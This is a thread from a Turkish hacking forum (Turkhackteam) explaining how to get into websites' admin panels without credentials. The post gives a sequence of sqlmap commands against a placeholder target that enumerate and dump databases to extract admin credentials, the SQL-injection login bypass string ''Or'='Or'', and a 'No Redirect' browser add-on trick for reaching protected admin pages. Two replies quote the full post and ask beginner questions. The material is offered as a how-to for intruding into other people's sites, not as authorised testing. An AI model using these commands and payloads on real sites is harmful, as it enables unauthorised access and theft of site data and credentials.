Sızma Testleri Admin Paneline Girme

Safak-Bey

Uzman üye
9 Ara 2021
1,795
10
1,990
Gereken Yerde
Merhabalar,
Sitelerin admin panel bilgilerini öğrenmek için sitede eğer
sql açığı varsa sitenin databasesini çekerek admin bilgilerine ulaşabilirsin ya da panelin kendisinde bulunan login bypass veya no redirect açıkları varsa username ve password bilgilerine ihtiyaç duymadan direk girebilirsin.


SQL Açığı ile;
Eğer sitede sql açığı varsa sqlmap aracı ile veya manuel olarak database çekebilirsiniz. SQLMAP aracının basit komutları aşağıdadır. Komutları sıra ile girin;
sqlmap -u "http ://hedefsite.com/index.php?id=1" --dbs --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch


LOGİN BYPASS Açığı ile;
Login bypass açığı ise panelde bulunan username ve password kısımlarına ''Or'='Or'' yazarak giriş yapmaktır. Diğer login bypass kodları içi tıklayın.


NO REDİRECT Açığı ile;
No Redirect bir eklentidir. Bu açığı kullanmak için firefox' un eski sürümü veya cyberfox' u indirerek no redirect eklentisini indirmeniz gerekmekte. Daha sonra eklentiyi açarak add kısmına tıklayın ve admin login sayfasının linkini yapıştırın. Ardından ok' a basın ve login sayfasına gelerek url' yi değiştirerek giriş yapmaya çalışın. örn: /dashboard.php, /manage.php, /index.php şeklinde deneyerek girmeye çalışın eğer açık var ise panele girersiniz.


İlgili açıkların konuları forumda mevcuttur, araştırarak daha iyi öğrenebilirsiniz.
İyi forumlar...
 
24 Ağu 2017
153
1
24
Kayseri
Merhabalar,
Sitelerin admin panel bilgilerini öğrenmek için sitede eğer
sql açığı varsa sitenin databasesini çekerek admin bilgilerine ulaşabilirsin ya da panelin kendisinde bulunan login bypass veya no redirect açıkları varsa username ve password bilgilerine ihtiyaç duymadan direk girebilirsin.


SQL Açığı ile;
Eğer sitede sql açığı varsa sqlmap aracı ile veya manuel olarak database çekebilirsiniz. SQLMAP aracının basit komutları aşağıdadır. Komutları sıra ile girin;
sqlmap -u "http ://hedefsite.com/index.php?id=1" --dbs --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch


LOGİN BYPASS Açığı ile;
Login bypass açığı ise panelde bulunan username ve password kısımlarına ''Or'='Or'' yazarak giriş yapmaktır. Diğer login bypass kodları içi tıklayın.


NO REDİRECT Açığı ile;
No Redirect bir eklentidir. Bu açığı kullanmak için firefox' un eski sürümü veya cyberfox' u indirerek no redirect eklentisini indirmeniz gerekmekte. Daha sonra eklentiyi açarak add kısmına tıklayın ve admin login sayfasının linkini yapıştırın. Ardından ok' a basın ve login sayfasına gelerek url' yi değiştirerek giriş yapmaya çalışın. örn: /dashboard.php, /manage.php, /index.php şeklinde deneyerek girmeye çalışın eğer açık var ise panele girersiniz.


İlgili açıkların konuları forumda mevcuttur, araştırarak daha iyi öğrenebilirsiniz.
İyi forumlar...
hocam bu kodları cmd ye mi yazıyoruz ?
 
24 Ağu 2017
153
1
24
Kayseri
Merhabalar,
Sitelerin admin panel bilgilerini öğrenmek için sitede eğer
sql açığı varsa sitenin databasesini çekerek admin bilgilerine ulaşabilirsin ya da panelin kendisinde bulunan login bypass veya no redirect açıkları varsa username ve password bilgilerine ihtiyaç duymadan direk girebilirsin.


SQL Açığı ile;
Eğer sitede sql açığı varsa sqlmap aracı ile veya manuel olarak database çekebilirsiniz. SQLMAP aracının basit komutları aşağıdadır. Komutları sıra ile girin;
sqlmap -u "http ://hedefsite.com/index.php?id=1" --dbs --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi --tables --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi --columns --batch
sqlmap -u
"http ://hedefsite.com/index.php?id=1" -D db_adi -T tablo_adi -C kolon_adi/adlari --dump --batch


LOGİN BYPASS Açığı ile;
Login bypass açığı ise panelde bulunan username ve password kısımlarına ''Or'='Or'' yazarak giriş yapmaktır. Diğer login bypass kodları içi tıklayın.


NO REDİRECT Açığı ile;
No Redirect bir eklentidir. Bu açığı kullanmak için firefox' un eski sürümü veya cyberfox' u indirerek no redirect eklentisini indirmeniz gerekmekte. Daha sonra eklentiyi açarak add kısmına tıklayın ve admin login sayfasının linkini yapıştırın. Ardından ok' a basın ve login sayfasına gelerek url' yi değiştirerek giriş yapmaya çalışın. örn: /dashboard.php, /manage.php, /index.php şeklinde deneyerek girmeye çalışın eğer açık var ise panele girersiniz.


İlgili açıkların konuları forumda mevcuttur, araştırarak daha iyi öğrenebilirsiniz.
İyi forumlar...
no redirecti çalıştıramadım bu arada
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.